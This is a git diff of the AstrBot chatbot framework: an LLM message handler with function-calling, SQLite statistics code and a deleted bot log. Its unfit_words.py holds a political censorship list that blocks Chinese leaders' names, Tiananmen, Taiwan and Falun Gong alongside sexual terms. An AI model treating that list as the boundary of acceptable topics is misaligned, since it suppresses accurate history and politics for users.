self.provider = self.context.llms[0].llm_instance if len(self.context.llms) > 0 else None
|
||||
self.reply_prefix = str(self.context.config_helper.platform_settings.reply_prefix)
|
||||
self.llm_tools = FuncCall(self.provider)
|
||||
|
||||
def set_provider(self, provider: Provider):
|
||||
self.provider = provider
|
||||
|
||||
async def handle(self, message: AstrMessageEvent, llm_provider: Provider = None) -> MessageResult:
|
||||
'''
|
||||
Handle the message event, including commands, plugins, etc.
|
||||
|
||||
`llm_provider`: the provider to use for LLM. If None, use the default provider
|
||||
'''
|
||||
msg_plain = message.message_str.strip()
|
||||
provider = llm_provider if llm_provider else self.provider
|
||||
|
||||
if os.environ.get('TEST_MODE', 'off') != 'on':
|
||||
self.persist_manager.record_message(message.platform.platform_name, message.session_id)
|
||||
|
||||
# TODO: this should be configurable
|
||||
# if not message.message_str:
|
||||
# return MessageResult("Hi~")
|
||||
|
||||
# check the rate limit
|
||||
if not self.rate_limit_helper.check_frequency(message.message_obj.sender.user_id):
|
||||
logger.warning(f"用户 {message.message_obj.sender.user_id} 的发言频率超过限制,已忽略。")
|
||||
return
|
||||
|
||||
# remove the nick prefix
|
||||
for nick in self.context.config_helper.wake_prefix:
|
||||
if msg_plain.startswith(nick):
|
||||
msg_plain = msg_plain.removeprefix(nick)
|
||||
break
|
||||
message.message_str = msg_plain
|
||||
|
||||
# scan candidate commands
|
||||
cmd_res = await self.command_manager.scan_command(message, self.context)
|
||||
if cmd_res:
|
||||
assert(isinstance(cmd_res, CommandResult))
|
||||
return MessageResult(
|
||||
cmd_res.message_chain,
|
||||
is_command_call=True,
|
||||
use_t2i=cmd_res.is_use_t2i
|
||||
)
|
||||
|
||||
# middlewares
|
||||
for middleware in self.context.middlewares:
|
||||
try:
|
||||
logger.info(f"执行中间件 {middleware.origin}/{middleware.name}...")
|
||||
await middleware.func(message, self.context)
|
||||
except BaseException as e:
|
||||
logger.error(f"中间件 {middleware.origin}/{middleware.name} 处理消息时发生异常:{e},跳过。")
|
||||
logger.error(traceback.format_exc())
|
||||
|
||||
if message.only_command:
|
||||
return
|
||||
|
||||
# next is the LLM part
|
||||
# check if the message is a llm-wake-up command
|
||||
if self.llm_wake_prefix and not msg_plain.startswith(self.llm_wake_prefix):
|
||||
logger.debug(f"消息 `{msg_plain}` 没有以 LLM 唤醒前缀 `{self.llm_wake_prefix}` 开头,忽略。")
|
||||
return
|
||||
|
||||
if not provider:
|
||||
logger.debug("没有任何 LLM 可用,忽略。")
|
||||
return
|
||||
|
||||
# check the content safety
|
||||
if not await self.content_safety_helper.check_content(msg_plain):
|
||||
return MessageResult("信息包含违规内容,由于机器人管理者开启内容安全审核,你的此条消息已被停止继续处理。")
|
||||
|
||||
image_url = None
|
||||
for comp in message.message_obj.message:
|
||||
if isinstance(comp, Image):
|
||||
image_url = comp.url if comp.url else comp.file
|
||||
break
|
||||
try:
|
||||
if not self.llm_tools.empty():
|
||||
# tools-use
|
||||
tool_use_flag = True
|
||||
llm_result = await provider.text_chat(
|
||||
prompt=msg_plain,
|
||||
session_id=message.session_id,
|
||||
tools=self.llm_tools.get_func()
|
||||
)
|
||||
|
||||
if isinstance(llm_result, Function):
|
||||
logger.debug(f"function-calling: {llm_result}")
|
||||
func_obj = None
|
||||
for i in self.llm_tools.func_list:
|
||||
if i["name"] == llm_result.name:
|
||||
func_obj = i["func_obj"]
|
||||
break
|
||||
if not func_obj:
|
||||
return MessageResult("AstrBot Function-calling 异常:未找到请求的函数调用。")
|
||||
try:
|
||||
args = json.loads(llm_result.arguments)
|
||||
args['ame'] = message
|
||||
args['context'] = self.context
|
||||
try:
|
||||
cmd_res = await func_obj(**args)
|
||||
except TypeError as e:
|
||||
args.pop('ame')
|
||||
args.pop('context')
|
||||
cmd_res = await func_obj(**args)
|
||||
if isinstance(cmd_res, CommandResult):
|
||||
return MessageResult(
|
||||
cmd_res.message_chain,
|
||||
is_command_call=True,
|
||||
use_t2i=cmd_res.is_use_t2i
|
||||
)
|
||||
elif isinstance(cmd_res, str):
|
||||
return MessageResult(cmd_res)
|
||||
elif not cmd_res:
|
||||
return
|
||||
else:
|
||||
return MessageResult(f"AstrBot Function-calling 异常:调用:{llm_result} 时,返回了未知的返回值类型。")
|
||||
except BaseException as e:
|
||||
traceback.print_exc()
|
||||
return MessageResult("AstrBot Function-calling 异常:" + str(e))
|
||||
else:
|
||||
return MessageResult(llm_result)
|
||||
|
||||
else:
|
||||
# normal chat
|
||||
tool_use_flag = False
|
||||
llm_result = await provider.text_chat(
|
||||
prompt=msg_plain,
|
||||
session_id=message.session_id,
|
||||
image_url=image_url
|
||||
)
|
||||
except BadRequestError as e:
|
||||
if tool_use_flag:
|
||||
# seems like the model don't support function-calling
|
||||
logger.error(f"error: {e}. Using local function-calling implementation")
|
||||
|
||||
try:
|
||||
# use local function-calling implementation
|
||||
args = {
|
||||
'question': llm_result,
|
||||
'func_definition': self.llm_tools.func_dump(),
|
||||
}
|
||||
_, has_func = await self.llm_tools.func_call(**args)
|
||||
|
||||
if not has_func:
|
||||
# normal chat
|
||||
llm_result = await provider.text_chat(
|
||||
prompt=msg_plain,
|
||||
session_id=message.session_id,
|
||||
image_url=image_url
|
||||
)
|
||||
except BaseException as e:
|
||||
logger.error(traceback.format_exc())
|
||||
return CommandResult("AstrBot Function-calling 异常:" + str(e))
|
||||
|
||||
except BaseException as e:
|
||||
logger.error(traceback.format_exc())
|
||||
logger.error(f"LLM 调用失败。")
|
||||
return MessageResult("AstrBot 请求 LLM 资源失败:" + str(e))
|
||||
|
||||
# concatenate reply prefix
|
||||
if self.reply_prefix:
|
||||
llm_result = self.reply_prefix + llm_result
|
||||
|
||||
# mask unsafe content
|
||||
llm_result = self.content_safety_helper.filter_content(llm_result)
|
||||
check = self.content_safety_helper.baidu_check(llm_result)
|
||||
if not check:
|
||||
return MessageResult("LLM 输出的信息包含违规内容,由于机器人管理者开启了内容安全审核,该条消息已拦截。")
|
||||
|
||||
return MessageResult(llm_result)
|
||||
114
astrbot/message/unfit_words.py
Normal file
@@ -0,0 +1,114 @@
|
||||
# 网上搜集的。
|
||||
# 来源词拦截
|
||||
# 支持正则
|
||||
unfit_words_q = ["习近平",
|
||||
"胡锦涛",
|
||||
"江泽民",
|
||||
"温家宝",
|
||||
"李克强",
|
||||
"李长春",
|
||||
"毛泽东",
|
||||
"邓小平",
|
||||
"周恩来",
|
||||
"社会主义",
|
||||
"共产党",
|
||||
"共产主义",
|
||||
"大陆官方",
|
||||
"北京政权",
|
||||
"中华帝国",
|
||||
"中国政府",
|
||||
"共狗",
|
||||
"六四事件",
|
||||
"天安门",
|
||||
"六四",
|
||||
"政治局常委",
|
||||
"学潮",
|
||||
"八九",
|
||||
"二十大",
|
||||
"民进党",
|
||||
"台独",
|
||||
"台湾独立",
|
||||
"台湾国",
|
||||
"国民党",
|
||||
"台湾民国",
|
||||
"中华民国",
|
||||
"pornhub",
|
||||
"Pornhub",
|
||||
"作爱",
|
||||
"做爱",
|
||||
"性交",
|
||||
"自慰",
|
||||
"阴茎",
|
||||
"淫妇",
|
||||
"肛交",
|
||||
"交配",
|
||||
"性关系",
|
||||
"性活动",
|
||||
"色情",
|
||||
"色图",
|
||||
"裸体",
|
||||
"小穴",
|
||||
"淫荡",
|
||||
"性爱",
|
||||
"港独",
|
||||
"法轮功",
|
||||
"六四"]
|
||||
|
||||
# 回复词过滤
|
||||
unfit_words = ["习近平",
|
||||
"胡锦涛",
|
||||
"江泽民",
|
||||
"温家宝",
|
||||
"李克强",
|
||||
"李长春",
|
||||
"毛泽东",
|
||||
"邓小平",
|
||||
"周恩来",
|
||||
"社会主义",
|
||||
"共产党",
|
||||
"共产主义",
|
||||
"大陆官方",
|
||||
"北京政权",
|
||||
"中华帝国",
|
||||
"中国政府",
|
||||
"共狗",
|
||||
"六四事件",
|
||||
"天安门",
|
||||
"六四",
|
||||
"政治局常委",
|
||||
"学潮",
|
||||
"八九",
|
||||
"二十大",
|
||||
"民进党",
|
||||
"台独",
|
||||
"台湾独立",
|
||||
"台湾国",
|
||||
"国民党",
|
||||
"台湾民国",
|
||||
"中华民国",
|
||||
"pornhub",
|
||||
"Pornhub",
|
||||
"作爱",
|
||||
"做爱",
|
||||
"性交",
|
||||
"自慰",
|
||||
"阴茎",
|
||||
"淫妇",
|
||||
"肛交",
|
||||
"交配",
|
||||
"性关系",
|
||||
"性活动",
|
||||
"色情",
|
||||
"色图",
|
||||
"涩图",
|
||||
"裸体",
|
||||
"小穴",
|
||||
"淫荡",
|
||||
"性爱",
|
||||
"中华人民共和国",
|
||||
"党中央",
|
||||
"中央军委主席",
|
||||
"台湾",
|
||||
"港独",
|
||||
"法轮功",
|
||||
"PRC"]
|
||||
269
astrbot/persist/helper.py
Normal file
@@ -0,0 +1,269 @@
|
||||
import sqlite3
|
||||
import os
|
||||
import shutil
|
||||
import time
|
||||
from typing import Tuple
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
db_path = "data/data.db"
|
||||
if os.path.exists("data.db"):
|
||||
shutil.copy("data.db", db_path)
|
||||
with open(os.path.dirname(__file__) + "/initialization.sql", "r") as f:
|
||||
sql = f.read()
|
||||
|
||||
self.conn = sqlite3.connect(db_path)
|
||||
self.conn.text_factory = str
|
||||
c = self.conn.cursor()
|
||||
c.executescript(sql)
|
||||
self.conn.commit()
|
||||
|
||||
def record_message(self, platform, session_id):
|
||||
curr_ts = int(time.time())
|
||||
self.increment_stat_session(platform, session_id, 1)
|
||||
self.increment_stat_message(curr_ts, 1)
|
||||
self.increment_stat_platform(curr_ts, platform, 1)
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def increment_stat_session(self, platform, session_id, cnt):
|
||||
# if not exist, insert
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
if self.check_stat_session(platform, session_id):
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_session SET cnt = cnt + ? WHERE platform = ? AND session_id = ?
|
||||
''', (cnt, platform, session_id)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_session(platform, session_id, cnt) VALUES (?, ?, ?)
|
||||
''', (platform, session_id, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_session(self, platform, session_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session WHERE platform = ? AND session_id = ?
|
||||
''', (platform, session_id)
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def get_all_stat_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_session_cnt_total(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT COUNT(*) FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_message(self, ts, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_message(ts)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_message SET cnt = cnt + ? WHERE ts = ?
|
||||
''', (cnt, new_ts)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_message(ts, cnt) VALUES (?, ?)
|
||||
''', (new_ts, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_message(self, ts) -> Tuple[bool, int]:
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts = ?
|
||||
''', (ts, )
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_message(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_message_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT SUM(cnt) FROM tb_stat_message
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_platform(self, ts, platform, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_platform(ts, platform)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_platform SET cnt = cnt + ? WHERE ts = ? AND platform = ?
|
||||
''', (cnt, new_ts, platform)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_platform(ts, platform, cnt) VALUES (?, ?, ?)
|
||||
''', (new_ts, platform, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_platform(self, ts, platform):
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts = ? AND platform = ?
|
||||
''', (ts, platform)
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_platform(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_platform_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT platform, SUM(cnt) FROM tb_stat_platform GROUP BY platform
|
||||
'''
|
||||
)
|
||||
# return c.fetchall()
|
||||
platforms = []
|
||||
ret = c.fetchall()
|
||||
for i in ret:
|
||||
# platforms[i[0]] = i[1]
|
||||
platforms.append({
|
||||
"name": i[0],
|
||||
"count": i[1]
|
||||
})
|
||||
return platforms
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
18
astrbot/persist/initialization.sql
Normal file
@@ -0,0 +1,18 @@
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
);
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_session(
|
||||
platform VARCHAR(32),
|
||||
session_id VARCHAR(32),
|
||||
cnt INTEGER
|
||||
);
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_message(
|
||||
ts INTEGER,
|
||||
cnt INTEGER
|
||||
);
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_platform(
|
||||
ts INTEGER,
|
||||
platform VARCHAR(32),
|
||||
cnt INTEGER
|
||||
);
|
||||
323
botpy.log
@@ -1,323 +0,0 @@
|
||||
2022-12-08 14:29:09,486 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 14:29:10,173 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 14:29:10,174 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 14:29:10,175 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 14:29:10,175 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 14:29:10,335 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 14:29:10,460 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 14:29:10,461 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:17:18,117 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:17:18,355 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/users/@me, 错误代码: 401, 返回内容: {'message': 'wrong bot token', 'code': 11242}, trace_id:829d8c60d296a3edcfac3d776dbd8b47
|
||||
2022-12-08 16:18:59,759 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:19:00,266 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:19:00,267 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:19:00,268 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:19:00,268 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:19:00,412 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:19:00,522 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:19:00,522 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:20:14,446 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:20:15,035 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:20:15,036 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:20:15,037 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:20:15,037 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:20:15,232 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:20:15,320 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:20:15,321 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:42:06,957 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:42:07,468 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:42:07,469 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:42:07,469 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:42:07,470 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:42:07,672 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:42:07,862 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:42:07,863 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:45:44,758 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:45:45,439 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:45:45,440 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:45:45,441 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:45:45,441 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:45:45,751 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:45:45,858 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:45:45,859 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:47:16,567 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:47:17,008 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:47:17,009 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:47:17,009 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:47:17,010 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:47:17,187 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:47:17,284 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:47:17,285 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:48:39,358 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:48:45,366 [WARNING] (http.py:188)request 请求超时,请求连接: https://api.sgroup.qq.com/gateway/bot
|
||||
2022-12-08 16:48:53,301 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:48:53,789 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:48:53,790 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:48:53,791 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:48:53,791 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:48:53,969 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:48:54,062 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:48:54,063 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:49:26,466 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:b201dd7b37649dcf47b82d54c58bc5dd
|
||||
2022-12-08 16:51:59,155 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:51:59,728 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:51:59,729 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:51:59,730 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:51:59,730 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:51:59,887 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:52:00,022 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:52:00,023 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:52:28,760 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:e62b072c9f0184f6bf7dd03a00fc0ef3
|
||||
2022-12-08 16:53:53,370 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:53:53,890 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:53:53,891 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:53:53,892 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:53:53,892 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:53:54,101 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:53:54,194 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:53:54,195 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:54:26,287 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 16:55:01,062 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:55:01,601 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:55:01,601 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:55:01,602 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:55:01,603 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:55:01,742 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:55:01,816 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:55:01,817 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:00:29,939 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:00:30,583 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:00:30,584 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:00:30,585 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:00:30,585 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:00:30,839 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:00:30,943 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:00:30,944 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:00:53,548 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:2ea547d78364cea60583ed450e589a17
|
||||
2022-12-08 17:10:31,405 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:10:32,081 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:10:32,082 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:10:32,083 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:10:32,083 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:10:32,342 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:10:32,449 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:10:32,450 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:13:47,495 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:13:47,993 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:13:47,994 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:13:47,995 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
